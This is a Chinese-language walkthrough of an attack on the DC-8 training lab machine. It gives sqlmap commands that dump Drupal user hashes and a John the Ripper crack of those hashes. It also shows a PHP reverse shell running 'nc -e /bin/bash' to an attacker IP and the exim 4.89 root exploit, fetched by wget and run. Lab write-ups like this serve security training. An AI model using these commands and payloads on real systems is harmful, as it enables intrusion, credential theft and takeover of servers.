DC-8靶场下载及渗透实战详细过程（DC靶场系列）

目录

一. 信息收集

1. 主机扫描

2. 端口扫描

3. 目录扫描

4. 页面探测

二. 渗透过程

1. SQL注入

2. 爆破密文

3. 反弹shell

4. 提权

5. 找查flag

 DC-8靶场下载地址https://www.five86.com/downloads/DC-8.zip

一. 信息收集

1. 主机扫描

2. 端口扫描

3. 目录扫描

dirsearch -u 192.168.120.143 -e * -x 403 --random-agent

4. 页面探测

又是Drupal

确认Drupal版本7.67，该版本网上找不到漏洞，但是有源码，额，总不会让我们去挖这个的漏洞吧！？

探索发现，以前点那啥蓝色字体的时候会转跳到Drupal的官方，而这里就只加了参数nid，非常可疑，可能存在有SQL注入、xss等漏洞

二. 渗透过程

1. SQL注入

在nid参数后面加'

出现了SQL报错，接下来就上SQLmap跑了，爆一下数据库

sqlmap -u "http://192.168.120.143/?nid=1" --level=5 --risk=3 --batch --current-db

爆表

sqlmap -u "http://192.168.120.143/?nid=1" --level=5 --risk=3 --batch -D 'd7db' -tables

有一堆表，但是有用的只有users，接着爆字段名

sqlmap -u "http://192.168.120.143/?nid=1" --level=5 --risk=3 --batch -D 'd7db' -T 'users' -columns

接着看字段

sqlmap -u "http://192.168.120.143/?nid=1" --level=5 --risk=3 --batch -D 'd7db' -T 'users' -C'name,pass,uid' -dump

得到了两个用户，还有hash密文，我们建一个文件，将两个密文保存起来

2. 爆破密文

Drupal的hash密文是经过特殊加密的，用john进行爆破

john hash.txt

爆破出了一个密码turtle

3. 反弹shell

测试发现是john的密码，在/user/login处登入，探索发现在WEBFORM处可以编辑并执行PHP代码

不多bb，直接写入反弹shell

<?php
exec("nc -e /bin/bash 192.168.120.129 6666");
?> 

将提交重定向行Confirmation page（确认页面）给勾上，然后滑下点保存，联系随便填入联系表单，点击发送，触发PHP代码

反弹shell成功！

4. 提权

找查一下suid权限的二进制文件

find / -perm -4000 -print 2>/dev/null

之前的DC靶场机exim4提权都失败了，这里再试一下，先看一下版本

exim --version

exim 4.89

接着找一下漏洞

searchsploit exim 4 

复制一下文件

cp /usr/share/exploitdb/exploits/linux/local/46996.sh hack.sh  

开启http服务

python -m http.server 8888 

在DC-7中下载该文件，先跳到tmp目录

cd /tmp

wget 192.168.120.129:8888/hack.sh

接着查看一下文件权限

ls -la

可以看到文件是不可执行的，我们可以用chmod命令赋予执行权限

chmod 777 hack.sh

接着根据sh脚本提示，执行文件

./hack.sh -m netcat

 提权成功，有点奇怪就是过一会root权限就消失了，所以动作要快

5. 找查flag

在root目录下发现flag文件

拿到flag！！！